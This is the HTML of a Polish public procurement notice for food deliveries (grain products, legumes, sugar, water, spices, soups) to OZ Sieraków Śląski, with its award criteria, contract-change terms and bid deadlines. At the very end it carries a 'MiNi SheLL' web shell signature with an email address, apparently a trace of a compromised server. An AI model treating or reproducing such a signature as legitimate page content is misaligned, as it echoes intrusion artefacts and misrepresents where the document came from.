zamówienia</h3> <p class="mb-0"> CZEŚĆ NR 6 – PRODUKTY PRZEMIAŁU ZIARNA -dostawa do OZ Sieraków Śląski:<br/><br/>1.	Kasza jęczmienna w opak. do 25 kg - CPV 15613100-9<br/>dostawy 1 raz na 2 tygodnie w ilości ok. 308 kg	kg	8 000<br/>2.	Kasza manna w opak. do 25 kg - CPV 15613100-9<br/>dostawy 1 raz na 2 tygodnie w ilości ok. 62 kg	kg	1 600<br/>3.	Mąka pszenna w opak. do 25 kg - CPV 15612100-2<br/>dostawy 1 raz na 2 tygodnie w ilości ok. 154 kg	kg	4 000<br/>4.	Mąka ziemniaczana w opak. do 25 kg - CPV 15612100-2<br/>dostawy 1 raz na 2 tygodnie w ilości ok. 15 kg	kg	400<br/>5.	Ryż w opak. do 25 kg - CPV 15614300-3 <br/>dostawy 1 raz na 2 tygodnie w ilości ok. 177 kg	kg	4 600<br/>6.	Makaron różne formy w opak. do 50 kg - CPV 15851100-9 <br/>dostawy 1 raz na 2 tygodnie w ilości ok. 196 kg	kg	5 100 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15610000-7 - Produkty przemiału ziarna</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZEŚĆ NR 7 – PRZETWORZONE OWOCE I WARZYWA- dostawa do OZ Sieraków Śląski:<br/>1.	Groch połówki łuskany w opak. do 50 kg - CPV 15331130-7<br/>dostawy 1 raz na 2 tygodnie w ilości ok. 115 kg	kg	3 000<br/>2.	Fasola średnia w opak. do 50 kg - CPV 15331130-7<br/>dostawy 1 raz na 2 tygodnie w ilości ok. 154 kg	kg	4 000<br/>3.	Kostka sojowa w opak. do 50 kg - CPV 15330000-0<br/>dostawy 1 raz na 2 tygodnie w ilości ok. 58 kg	kg	1 500<br/>4.	Kotlety sojowe - kotlet a&#39;la schabowy o gramaturze min.30 g/szt.<br/>dostawy 1 raz na 2 tygodnie w ilości ok. 6 kg	kg	160<br/>5.	Pasztet sojowy Alupak 110 g – 130 g<br/>dostawy 1 raz na 2 tygodnie w ilości ok. 23 kg	kg	600<br/>6.	Dżem niskosłodzony w wiaderkach do 10 kg – CPV 15332296-5<br/>dostawy 1 raz na 2 tygodnie w ilości ok. 115 kg	kg	3 000<br/>7.	Marmolada w opak. do 15 kg - CPV 15332230-5<br/>dostawy 1 raz na 2 tygodnie w ilości ok. 69 kg	kg	1 800<br/>8.	Powidła śliwkowe do 15 kg - CPV 15332230-5<br/>dostawy 1 raz na 2 tygodnie w ilości ok. 69 kg	kg	1 800 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15330000-0 - Przetworzone owoce i warzywa</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 8</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZEŚĆ NR 8 – CUKIER -dostawa do OZ Sieraków Śląski: </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15830000-5 - Cukier i produkty pokrewne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 9</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZEŚĆ NR 9 – WODA MINERALNA - dostawa do OZ Sieraków Śląski:<br/><br/>Woda mineralna niegazowana w butelkach 1,5 l – CPV 15981000-8<br/>dostawy 1 raz w miesiącu w ilości ok. 247 l	l	3 000 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15981000-8 - Wody mineralne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 10</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZEŚĆ NR 10 – PRZYPRAWY, ZUPY I SOSY - dostawa do OZ Sieraków Śląski:<br/><br/>1.	Czosnek mielony w opak. do 1 kg - CPV 15872100-2<br/>dostawy 1 raz w miesiącu w ilości ok. 6 kg	kg	70<br/>2.	Papryka ostra mielona w opak. od 1 do 5 kg - CPV 15870000-7<br/>dostawy 1 raz w miesiącu w ilości ok. 5 kg	kg	60<br/>3.	Pieprz czarny mielony w opak. od 1 do 5 kg - CPV 15872100-2<br/>dostawy 1 raz w miesiącu w ilości ok. 12 kg	kg	140<br/>4.	Sól spożywcza w opak. do 50 kg - CPV 15872400-5 <br/>dostawy 1 raz w miesiącu w ilości ok. 148 kg	kg	1 800<br/>5.	Liść laurowy w opak. od 1 do 3 kg - CPV 15872000-1<br/>dostawy 1 raz w miesiącu w ilości ok. 3 kg	kg	40<br/>6.	Ziele angielskie w opak. od 1 do 5 kg - CPV 15872000-1<br/>dostawy 1 raz w miesiącu w ilości ok. 4 kg	kg	50<br/>7.	Majeranek suszony w opak. od 1 do 3 kg - CPV 15872000-1<br/>dostawy 1 raz w miesiącu w ilości ok. 4 kg	kg	50<br/>8.	Koper suszony w opak. od 1 do 3 kg - CPV 15872000-1<br/>dostawy 1 raz w miesiącu w ilości ok. 4 kg	kg	50<br/>9.	Musztarda w opak. Do 5 kg – CPV 15871250-1<br/>dostawy 1 raz w miesiącu w ilości ok. 16 kg	kg	200<br/>10.	Majonez w opak. Do 5 kg – CPV 15871273-8<br/>dostawy 1 raz w miesiącu w ilości ok. 16 kg	kg	200<br/>11.	Ocet w opak. od 0,5 do 1 l - CPV 15871110-8 <br/>dostawy 1 raz w miesiącu w ilości ok. 15 l	l	180<br/>12.	Kwasek cytrynowy w opak. do 5 kg - CPV 15870000-7<br/>dostawy 1 raz w miesiącu w ilości ok. 5 kg	kg	60<br/>13.	Przyprawa do zup w płynie w opak. Do 1 l - CPV 15870000-7<br/>dostawy 1 raz w miesiącu w ilości ok. 140 l	l	1 700<br/>14.	Koncentrat pomidorowy 30% w opak. od 0,9 do 5 kg - CPV 15331427-6<br/>dostawy 1 raz w miesiącu w ilości ok. 198 kg	kg	2 400<br/>15.	Leczo pieczarkowe w opak. od 5 do 10 kg - CPV 15331000-7<br/>dostawy 1 raz w miesiącu w ilości ok. 157 kg	kg	1 900<br/>16.	Kisiel bez cukru w opak. do 5 kg - CPV 15870000-7<br/>dostawy 1 raz w miesiącu w ilości ok. 7 kg	kg	80<br/>17.	Herbata w opak. do 1 kg - CPV15863000-5<br/>dostawy 1 raz w miesiącu w ilości ok. 49 kg	kg	600<br/>18.	Kawa zbożowa w opak. do 50 kg - CPV 15860000-4<br/>dostawy 1 raz w miesiącu w ilości ok. 78 kg	kg	950<br/>19.	Bulion warzywny w opak. do 5 kg – CPV 15891500-5<br/>dostawy 1 raz w miesiącu w ilości ok. 124 kg	kg	1 500<br/>20.	Zupa barszcz biały w opak. od 1 do 5 kg - CPV 15891400-4<br/>dostawy 1 raz w miesiącu w ilości ok. 19 kg	kg	225<br/>21.	Zupa barszcz czerwony w opak. od 1 do 5 kg - CPV 15891400-4<br/>dostawy 1 raz w miesiącu w ilości ok. 16 kg	kg	200<br/>22.	Zupa kalafiorowa w opak. od 1 do 5 kg - CPV 15891400-4<br/>dostawy 1 raz w miesiącu w ilości ok. 16 kg	kg	200<br/>23.	Zupa brokułowa w opak. od 1 do 5 kg - CPV 15891400-5<br/>dostawy 1 raz w miesiącu w ilości ok. 16 kg	kg	200<br/>24.	Zupa żurek w opak. od 1 do 5 kg - CPV 15891400-4<br/>dostawy 1 raz w miesiącu w ilości ok. 16 kg	kg	200<br/>25.	Zupa szparagowa w opak. od 1 do 5 kg - CPV 15891400-5<br/>dostawy 1 raz w miesiącu w ilości ok. 16 kg	kg	200<br/>26.	Zupa grzybowa w opak. od 1 do 5 kg - CPV 15891400-4<br/>dostawy 1 raz w miesiącu w ilości ok. 16 kg	kg	200<br/>27.	Zupa cebulowa w opak. od 1 do 5 kg - CPV 15891400-4<br/>dostawy 1 raz w miesiącu w ilości ok. 16 kg	kg	200<br/>28.	Sos meksykański w opak. od 1 do 5 kg - CPV 15871200-6<br/>dostawy 1 raz w miesiącu w ilości ok. 14 kg	kg	175<br/>29.	Sos myśliwski w opak. od 1 do 5 kg - CPV 15871200-6<br/>dostawy 1 raz w miesiącu w ilości ok. 14 kg	kg	175<br/>30.	Sos boloński w opak. od 1 do 5 kg - CPV 15871200-6<br/>dostawy 1 raz w miesiącu w ilości ok. 14 kg	kg	175<br/>31.	Kukurydza w opak. od 1 do 5 kg - CPV 15871200-6<br/>dostawy 1 raz w miesiącu w ilości ok. 12 kg	kg	150 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15870000-7 - Przyprawy i przyprawy korzenne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamaw.przewid.możli.wprowadz. zmian w umowie: 1) zmiany obow. przepisów prawnych mających wpływ na realizację<br/>Umowy, a w szczególności na jej zakres, termin; 2) zm. konta, o którym mowa w § 6 ust. 1 umowy; 3) zm. nazwy, adresu<br/>Ogłoszenie nr 2025/BZP 00495354/01 z dnia 2025-10-24<br/>2025-10-24 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy<br/>firmy, spowodowane zmianą formy organizacyjno-prawnej, przeksz. lub połączeniem z inną firmą; 4) wystąpienia sytuacji<br/>niemożliwej do przewidzenia w chwili zawarcia umowy, a mającej wpływ na jej realizację; 5) zmniej. łącznej wart. brutto<br/>danej części zamówienia do 30% od wartości danej części umowy ze względu na wystąpienie okoliczności, kt.nie można<br/>było przewidzieć w dacie zawierania umowy, w tym zwł. powodowanych zmniej. liczby os., bądź innych nadzwyczajnych<br/>sytuacji lub zdarzeń; 6) gdy zamaw. korzysta z zastrz.prawa do skorzystania z okresowych promocji i upustów<br/>wprowadzonych przez prod. (ceny niższe niż zawarte w umowie); 7) zmiany terminu wykonania dostawy spowodowanej: a)<br/>zaistnieniem siły wyższej, kt. w rozumieniu Stron jest zdarzeniem zew., niemożliwym do przewidzenia, zwłaszcza<br/>zdarzeniem będącym działaniami przyrody o katastrofalnych skutkach (m.in.: powodzie, pożary, wyładowania elektryczne w<br/>czasie burzy, powodujące uszkodzenia ważnych urządzeń itp.),<br/>b) zdarzeniem nadzwyczajnym w postaci zaburzeń życia zbiorowego (m.in. działania wojenne, zamieszki krajowe, rewolty,<br/>itp.), aktem władzy ustawodawczej i wykonawczej (np. wywłaszczenie, embargo informacyjne lub towarowe itp.), przy czym<br/>chodzi tu w szczególności o niemożność zapobieżenia szkodliwym następstwom siły wyższej, c) bezprawnym działaniem<br/>osób trzecich, za kt.Wykon.nie ponosi odpowiedzialności w oparciu o powszechnie obow. przepisy prawa lub umowy.<br/>2. Strony, mając na uwadze ewentualną zmianę stawek podatku od towarów i usług, zgodnie postanawiają, iż w przypadku<br/>ich zmiany może ulec zmianie cena brutto, przy zachowaniu następujących warunków: a) w sytuacji podwyższenia stawki<br/>podatku od towarów i usług dla danego towaru (asortymentu) – Wykon.uprawniony jest do podwyższenia ceny brutto za<br/>dany towar o różnicę w staw.podatku od towarów i usług pomiędzy stawką określ. w ofercie Wykon., a stawką obow.ą po<br/>zmianie stawki. Wykon. nie jest uprawniony do podwyższenia ceny brutto za towary dostar.Zamaw., przed dniem zmiany<br/>stawki podatku. b) w sytuacji obniżenia stawki podatku od towarów i usług dla danego towaru – Wykon. zobow. jest do<br/>obniżenia ceny brutto za dany towar o różnicę w stawkach podatku od towarów i usług pomiędzy stawką określona w ofercie<br/>Wykon., a stawką obow. po zmianie stawki podatku. 3. W przyp.określ.w ust. 2 pkt 1 i pkt 2, każdorazowo niezmienna<br/>pozostaje cena netto towaru, stanowiąca podst. do naliczenia podatku od towarów i usług. 4. Zamaw. przewiduje, że w<br/>okresie trwania podpisanej, obow.umowy podane ceny jedn.towarów mogą ulec zmianie kwart. o wskaźnik cen towarów i<br/>usł.kons.ogłaszany przez prezesa GUS. Wzrost lub obniżenie cen jednost. nie większe niż 10 % nie będzie stanowiło<br/>podstawy do ubiegania się przez Stronę o waloryzację wartości umowy. 5. Zmiana cen jedn. nastąpić na podstawie wniosku<br/>Strony o waloryzację cen oraz dokum. dołączonych do tego wniosku potwierdzających rzeczywistą zmianę cen powyżej<br/>wskaźnika określonego w pkt 4.<br/>6. Zm.wynagr. w wys. 50% zmiany wykaz. w pkt 5, może nastąpić na podst.pisemnego aneksu podp. przez obie Strony<br/>Umowy. 7. Maks.wartość zmiany cen, jaką dopuszcza Zamawiający, to łącznie do 50 % w stosunku do wartości całkowitego<br/>wynagr. brutto określ. w § 2 ust. 1 umowy. 8 Wszystkie zmiany umowy wymagają formy pisemnej (aneks do umowy) pod<br/>rygorem nieważności z wyjątkiem przypadków określonych w ust. 1 pkt 4 i 5. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-11-05 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Formularza do złożenia oferty dostępnego na platformie e-Zamówienia.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-11-05 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com